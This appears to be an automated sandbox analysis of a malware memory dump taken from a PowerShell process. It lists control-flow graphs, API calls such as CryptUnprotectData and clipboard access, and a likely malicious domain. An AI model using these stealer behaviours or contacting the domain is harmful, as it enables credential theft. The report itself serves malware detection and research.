                                                                                                              control_flow_graph 761 40d0c6-40d0fa call 432d40 call 4094b0 CoUninitialize 766 40d100-40d128 761->766 766->766 767 40d12a-40d13b 766->767 768 40d140-40d183 767->768 768->768 769 40d185-40d1ea 768->769 770 40d1f0-40d227 769->770 770->770 771 40d229-40d23a 770->771 772 40d25b-40d26e 771->772 773 40d23c-40d24a 771->773 775 40d270-40d271 772->775 776 40d28b-40d295 772->776 774 40d250-40d259 773->774 774->772 774->774 777 40d280-40d289 775->777 778 40d297-40d29b 776->778 779 40d2ab-40d2b3 776->779 777->776 777->777 780 40d2a0-40d2a9 778->780 781 40d2b5-40d2b6 779->781 782 40d2cb-40d2d5 779->782 780->779 780->780 785 40d2c0-40d2c9 781->785 783 40d2d7-40d2db 782->783 784 40d2eb-40d2f7 782->784 786 40d2e0-40d2e9 783->786 787 40d311-40d431 784->787 788 40d2f9-40d2fb 784->788 785->782 785->785 786->784 786->786 790 40d440-40d461 787->790 789 40d300-40d30d 788->789 789->789 791 40d30f 789->791 790->790 792 40d463-40d47f 790->792 791->787 793 40d480-40d4a1 792->793 793->793 794 40d4a3-40d4c6 call 40b3e0 793->794 796 40d4cb-40d4ec 794->796
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Uninitialize
                                                                                                              • String ID: 67$learningypr.click$~zpH
                                                                                                              • API String ID: 3861434553-1069545691
                                                                                                              • Opcode ID: 1be672a5bdf9757e926f4921a3c06c074e7deaefdc987ae9b41fec6f68bdfe7c
                                                                                                              • Instruction ID: deebea354d72f030b423c3d853cb2474300e146dd88e3963930101d30d9c0535
                                                                                                              • Opcode Fuzzy Hash: 1be672a5bdf9757e926f4921a3c06c074e7deaefdc987ae9b41fec6f68bdfe7c
                                                                                                              • Instruction Fuzzy Hash: D2A1E17090D3C08BD325CF6988907EBBBE1AFD6304F18896DD0D95B396C779450ACB56

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 797 424010-424062 798 424070-424096 797->798 798->798 799 424098-4240e2 798->799 801 4240f0-424143 799->801 801->801 802 424145-424150 801->802 803 4244a2-4244ae 802->803 804 4241c2-4241ca 802->804 805 4241a0 802->805 806 4241c0 802->806 807 4242c0 802->807 808 4241a6 802->808 809 4242c6-4242cd 802->809 810 4244af-42455f 802->810 811 4241ac-4241b2 call 407f80 802->811 812 4242d6-4242de 802->812 813 424157-42415c 802->813 814 424474 802->814 815 4241b5-4241bf 802->815 816 424498-42449f 802->816 817 424458-42446d 802->817 818 4241d3 804->818 819 4241cc-4241d1 804->819 805->808 808->811 809->812 829 424560-4245ac 810->829 811->815 830 4242e0-4242e5 812->830 831 4242e7 812->831 827 424165 813->827 828 42415e-424163 813->828 815->806 820 4244a0 816->820 817->803 817->814 817->816 817->820 821 424737 817->821 822 42447a-424480 call 407f80 817->822 823 424489 817->823 824 4245ce-4245e6 817->824 825 42448f-424495 call 407f80 817->825 826 42473d-424746 call 407f80 817->826 835 4241da-424211 call 407f70 818->835 819->835 822->823 841 4245f0-42464b 824->841 825->816 838 424168-42418c call 407f70 827->838 828->838 829->829 839 4245ae-4245be call 4223a0 829->839 840 4242ee-42439b call 407f70 830->840 831->840 855 424220-42423e 835->855 838->804 838->805 838->806 838->807 838->808 838->809 838->810 838->811 838->812 838->814 838->815 838->816 838->817 852 4245c3-4245c6 839->852 856 4243a0-4243d6 840->856 841->841 849 42464d-4246d3 841->849 854 4246e0-42470a 849->854 852->824 854->854 857 42470c-42472f call 422060 854->857 855->855 858 424240-424248 855->858 856->856 860 4243d8-4243e0 856->860 857->821 862 424261-42426e 858->862 863 42424a-42424f 858->863 864 4243e2-4243e9 860->864 865 424401-42440e 860->865 870 424270-424274 862->870 871 424291-42429c call 43f7c0 862->871 869 424250-42425f 863->869 872 4243f0-4243ff 864->872 867 424410-424414 865->867 868 424431-424451 GetLogicalDrives call 43f7c0 865->868 873 424420-42442f 867->873 868->803 868->814 868->816 868->817 868->820 868->821 868->822 868->823 868->824 868->825 868->826 869->862 869->869 875 424280-42428f 870->875 878 4242a1-4242ad 871->878 872->865 872->872 873->868 873->873 875->871 875->875 878->807 878->809 878->810 878->812 878->814 878->817 878->822 878->824
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BB$UG
                                                                                                              • API String ID: 0-4103563041
                                                                                                              • Opcode ID: 1bae9f378745d61849d634dce9bf024f166762a28b5d2be9344c3564e0e9dc10
                                                                                                              • Instruction ID: 156d9476684e9010c292169df6e28d61ec67e40a4f764ac4d0a5d14728a1d911
                                                                                                              • Opcode Fuzzy Hash: 1bae9f378745d61849d634dce9bf024f166762a28b5d2be9344c3564e0e9dc10
                                                                                                              • Instruction Fuzzy Hash: 0F0210B5A083409FD310CF64E88162BBBE5EBD2304F54892DF9859B352D7B8D906CB97

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 879 419f2f-419f37 call 407f80 882 41a05a-41a074 879->882 883 41a080-41a10c 882->883 883->883 884 41a112-41a121 883->884 885 41a127-41a136 884->885 886 41a1aa-41a213 call 401a60 884->886 888 41a140-41a147 885->888 892 41a220-41a23f 886->892 890 41a149-41a14c 888->890 891 41a18e-41a194 888->891 890->888 894 41a14e 890->894 891->886 893 41a196-41a1a7 call 43c160 891->893 892->892 895 41a241-41a25a call 401da0 892->895 893->886 894->886 900 41a261-41a263 895->900 901 419f48-419faf 895->901 902 41a42d 895->902 904 41a270-41a276 900->904 903 419fb0-41a015 901->903 906 41a434 902->906 903->903 905 41a017-41a03c call 401da0 903->905 904->904 907 41a278-41a289 904->907 905->901 913 41a043-41a053 905->913 914 419f3c-419f45 call 407f80 905->914 906->906 909 41a290 907->909 910 41a28b-41a28e 907->910 912 41a291-41a29d 909->912 910->909 910->912 915 41a2a4 912->915 916 41a29f-41a2a2 912->916 913->882 913->900 913->901 913->902 918 41a150-41a187 call 407f70 call 43fad0 913->918 919 419f0d-419f21 call 401000 913->919 920 419efc 913->920 921 419f2e 913->921 914->901 917 41a2a5-41a2c7 call 407f70 915->917 916->915 916->917 931 41a3c7-41a3fe call 43ddb0 917->931 932 41a2cd-41a2d4 917->932 918->882 918->886 918->900 918->901 918->902 918->919 918->920 918->921 919->921 920->919 921->879 936 41a403-41a423 CryptUnprotectData 931->936 935 41a2f0-41a334 call 41e6e0 * 2 932->935 941 41a2e0-41a2ea 935->941 942 41a336-41a351 call 41e6e0 935->942 936->902 941->931 941->935 942->941 945 41a353-41a37b 942->945 946 41a381-41a397 call 41e6e0 945->946 947 41a2da-41a2df 945->947 950 41a2d6 946->950 951 41a39d-41a3c2 946->951 947->941 950->947 951->941
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: pzs$
                                                                                                              • API String ID: 0-1216481787
                                                                                                              • Opcode ID: 0bf6f35e0ff0436d12387b4112f6c39f81766946263b006ec817a30d5d12b92f
                                                                                                              • Instruction ID: bad2e4c237128bc080bfd88e0f25895fa9b25d80b2d5779574f6d248565b9fff
                                                                                                              • Opcode Fuzzy Hash: 0bf6f35e0ff0436d12387b4112f6c39f81766946263b006ec817a30d5d12b92f
                                                                                                              • Instruction Fuzzy Hash: 41C136B2A083418BD724CF24C8957AFB7E2FBD5304F198A2DD48987391DB399855CB86
                                                                                                              APIs
                                                                                                              • LdrInitializeThunk.NTDLL(0043F5B8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C18E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 431 431c7e-431cb4 432 431cb6-431cb9 431->432 433 431cbb-431ceb 432->433 434 431ced-431eff SysAllocString 432->434 433->432 435 431f03-431f06 434->435 436 431f60-431f9d 435->436 437 431f08-431f5e 435->437 439 431fa7-431fd5 436->439 437->435
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocString
                                                                                                              • String ID: $!$$$%$&$)$)$-$-$0$2$4$6$>$A$C$E$G$I$K$M$O$Q$S$U$W$Y$Yz{@#^Q$[$]$_$g$i$k$m$o
                                                                                                              • API String ID: 2525500382-522938286
                                                                                                              • Opcode ID: ff019ebd26435f359dcf28e44e712dc7165cf618e877b448631396c271aaac4d
                                                                                                              • Instruction ID: 2f1c3c64c2a491f88769adbc13a15e256d52b4c8b6030e9a322d14bce727f2cc
                                                                                                              • Opcode Fuzzy Hash: ff019ebd26435f359dcf28e44e712dc7165cf618e877b448631396c271aaac4d
                                                                                                              • Instruction Fuzzy Hash: 8491D32150C7C18DE332C73C881879BBED11BA7224F084B9ED5E99B2E2D7BA4549C767

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1171 42f61d-42f649 1172 42f64b-42f64e 1171->1172 1173 42f650-42f686 1172->1173 1174 42f688-42f8a1 SysAllocString 1172->1174 1173->1172 1175 42f8a3-42f8a6 1174->1175 1176 42f8a8-42f91c 1175->1176 1177 42f91e-42f968 1175->1177 1176->1175 1179 42f972-42f99e 1177->1179
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocString
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2525500382-4108050209
                                                                                                              • Opcode ID: c180f1b85863e47242678d3f97803f0c69c53faf0486d10a2c819d29525043e7
                                                                                                              • Instruction ID: b4d7b026d8aa6781abbd5318ffcc20f8c8a0c303bcae06c1f8cef37b055f9dc9
                                                                                                              • Opcode Fuzzy Hash: c180f1b85863e47242678d3f97803f0c69c53faf0486d10a2c819d29525043e7
                                                                                                              • Instruction Fuzzy Hash: 71A1F721109FC28AD336C73C8958797BED26B63224F484B9ED0FB5B7D2D7656106C722

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1180 436db9-436ddd call 43ddb0 1183 436de1-436de4 1180->1183 1184 436ddf 1180->1184 1185 436de6 1183->1185 1186 436de8-436e0c GetUserDefaultUILanguage 1183->1186 1184->1183 1185->1186 1187 436e0e-436e11 1186->1187 1188 436e13-436e5f 1187->1188 1189 436e61-436e94 1187->1189 1188->1187
                                                                                                              APIs
                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436DE8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DefaultLanguageUser
                                                                                                              • String ID: rX]^
                                                                                                              • API String ID: 95929093-18585577
                                                                                                              • Opcode ID: c5782d1f1b1acb3603ed6c7abcf7a388ae5646f6ee8c3db6b7038f89b1178cb5
                                                                                                              • Instruction ID: ef175c13b8ced7d32decf1b74c942c3bf522003778d9426a1b8e920db7a7830d
                                                                                                              • Opcode Fuzzy Hash: c5782d1f1b1acb3603ed6c7abcf7a388ae5646f6ee8c3db6b7038f89b1178cb5
                                                                                                              • Instruction Fuzzy Hash: FE212F75E042A58FDB108A78CC813DDBBE09F59314F1981BDC994A7380D77D8D444B91
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ForegroundWindow
                                                                                                              • String ID: uhij
                                                                                                              • API String ID: 2020703349-574180738
                                                                                                              • Opcode ID: fe5da282865f109871a6ecb703cd99fa4c6c270345d4574396334971c51367c3
                                                                                                              • Instruction ID: 98d05f4d7b2230f5c666ae21a8e90cbed6482788d95c15171a925ee28005b505
                                                                                                              • Opcode Fuzzy Hash: fe5da282865f109871a6ecb703cd99fa4c6c270345d4574396334971c51367c3
                                                                                                              • Instruction Fuzzy Hash: 40012D7E70A1405BDB0C9B34ED4725B7BB39386309F08953DD442C3791ED3ED8068649
                                                                                                              APIs
                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBB5
                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EBCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 640775948-0
                                                                                                              • Opcode ID: 042b8f7b77cc745151dd42a6a5e6c6ba1ef6fa1493a5705103e72e0ec01d0f40
                                                                                                              • Instruction ID: 68dab68a2611eaf1f98fe2e0d682a4e8587265123918b47ae6ee898c9d74bc25
                                                                                                              • Opcode Fuzzy Hash: 042b8f7b77cc745151dd42a6a5e6c6ba1ef6fa1493a5705103e72e0ec01d0f40
                                                                                                              • Instruction Fuzzy Hash: C1F0B67ABC8320BBF67897149C17F9421149B86F62F354325BB293E7E4C6D43900858D
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BlanketProxy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3890896728-0
                                                                                                              • Opcode ID: c56bfe133a7e9b334f43a47dfc655985188feebc2614a32482a57a4b23c8fb11
                                                                                                              • Instruction ID: 189fe8157a22b933eaa9243c6b61fe273c95344eb111398440ebc431827aed26
                                                                                                              • Opcode Fuzzy Hash: c56bfe133a7e9b334f43a47dfc655985188feebc2614a32482a57a4b23c8fb11
                                                                                                              • Instruction Fuzzy Hash: 34F074B450D342CFE714DF29C5A871ABBE1BBC5344F01891CE4998B790D7B59549CF82
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BlanketProxy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3890896728-0
                                                                                                              • Opcode ID: 6120e3ea8a807733523cfe404b9402478c9ffdd6f76c91c5e4214e89bdad5abe
                                                                                                              • Instruction ID: 13b3eb9ee25cd7d89a9acbb5bbae49bfea62dd5ba0374e4de00fe8b64a3f7716
                                                                                                              • Opcode Fuzzy Hash: 6120e3ea8a807733523cfe404b9402478c9ffdd6f76c91c5e4214e89bdad5abe
                                                                                                              • Instruction Fuzzy Hash: 82F0FEB45093018FD304DF28C5A875BBBE0FF89344F11881CE0998B390C7B5AA48CF82
                                                                                                              APIs
                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: 7affa8ddd7996fb7e9b69a36d60abaed47600370150e60f81ecdfc71045c4293
                                                                                                              • Instruction ID: fa5ab94b9a6549c588a503765076fe980f8647f728cae694d10bd74d2d58c513
                                                                                                              • Opcode Fuzzy Hash: 7affa8ddd7996fb7e9b69a36d60abaed47600370150e60f81ecdfc71045c4293
                                                                                                              • Instruction Fuzzy Hash: CAE07D78AA00005BD30C5F28CC06F513325C787722F04823DB112832E6EC307908C314
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,?,00000000,0040B2E1,00000000,00000001,?,00000000), ref: 0043A905
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 69b30920e6c9834005f2320e373951eeef9118cf4aabf2b3416a293ff8ad59a4
                                                                                                              • Instruction ID: 8801ed89c68f70514b9edba5ed3968f9f60f5bda428713c8fd83ccc7b5780fd7
                                                                                                              • Opcode Fuzzy Hash: 69b30920e6c9834005f2320e373951eeef9118cf4aabf2b3416a293ff8ad59a4
                                                                                                              • Instruction Fuzzy Hash: F5E08C3040A221EBC2202F11FD06B8A3A24EF06722F0240B0F100AA4F1C770DC92DB8C
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32 ref: 0043C30C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ForegroundWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2020703349-0
                                                                                                              • Opcode ID: 28895f92958f0a94c77eede1aa7c39d81608709bbbce7b93a7923cd2d34917f3
                                                                                                              • Instruction ID: ca16adac3c72a2624057cc77a34347ccbcbd393879fb5e3d0e34a1d64ed82d61
                                                                                                              • Opcode Fuzzy Hash: 28895f92958f0a94c77eede1aa7c39d81608709bbbce7b93a7923cd2d34917f3
                                                                                                              • Instruction Fuzzy Hash: A3E086BDB061405FC704CB10EC036513367A38A2063188076D901C77A6DB39E805CA45
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                              • String ID: +$?$O$Q$W$`$b$c$n$q$r$|
                                                                                                              • API String ID: 2832541153-2449071873
                                                                                                              • Opcode ID: 70f3e16eb7e6523f201d396fa45a88fc54849c34cd480ac3fad2cb9dedd82d4e
                                                                                                              • Instruction ID: 92a310d55d5ea67847d73ba210176b314c5cefcfe13a23c4d34ff5e5e30a8fa4
                                                                                                              • Opcode Fuzzy Hash: 70f3e16eb7e6523f201d396fa45a88fc54849c34cd480ac3fad2cb9dedd82d4e
                                                                                                              • Instruction Fuzzy Hash: 77414CB050C3818EE341AF78D58935FBFE0AB96308F04586DE8C987292D6B9958CC767
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID: ,940$-$?$49$8:6?$#v
                                                                                                              • API String ID: 3664257935-1903658028
                                                                                                              • Opcode ID: 2713966c13a9916ab6070811b3172db1ae3e0a8211df943558d8602d3a422018
                                                                                                              • Instruction ID: 0e4f8ad514ff57aa5eb40feaeb3584a6191d670d19b9241763b9c925407e0e47
                                                                                                              • Opcode Fuzzy Hash: 2713966c13a9916ab6070811b3172db1ae3e0a8211df943558d8602d3a422018
                                                                                                              • Instruction Fuzzy Hash: 1891A1326083918FE3218F29CC517ABBBD1DFD6314F19896DE4C99B382D6389906C796
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit
                                                                                                              • String ID: %$'$)$+$-$/$1$3$5$7$9$:$;$|
                                                                                                              • API String ID: 2610073882-2490240685
                                                                                                              • Opcode ID: ce07dd7f79ead5cc65edd6cbb2a9c7635b8f66265ebf8010a9726540ef825b6c
                                                                                                              • Instruction ID: 2a2879e89a61be8d421707297cc0c2aa7788c55eaf340b1b63f7dd626f884428
                                                                                                              • Opcode Fuzzy Hash: ce07dd7f79ead5cc65edd6cbb2a9c7635b8f66265ebf8010a9726540ef825b6c
                                                                                                              • Instruction Fuzzy Hash: 6341493150C7C18ED3219B38888824BBFD1ABEA328F485B5DE0E5473D6C6B4854ACB57
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000016.00000002.3660988330.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_22_2_400000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID: #v
                                                                                                              • API String ID: 3664257935-554117064
                                                                                                              • Opcode ID: 3576e6e5bee3fcd926c74cb0881273e8799c85d97486a9ecef6eb4b5af749e29
                                                                                                              • Instruction ID: 7a82ca80c01636ea500b4cb05ffea793a021747bed86ad0fb6c34e0e14456062
                                                                                                              • Opcode Fuzzy Hash: 3576e6e5bee3fcd926c74cb0881273e8799c85d97486a9ecef6eb4b5af749e29
                                                                                                              • Instruction Fuzzy Hash: FCC002FAC18400EFDE026F61FE0A8293A31AF5730571501F1A42940132DB6A0D2ADA9E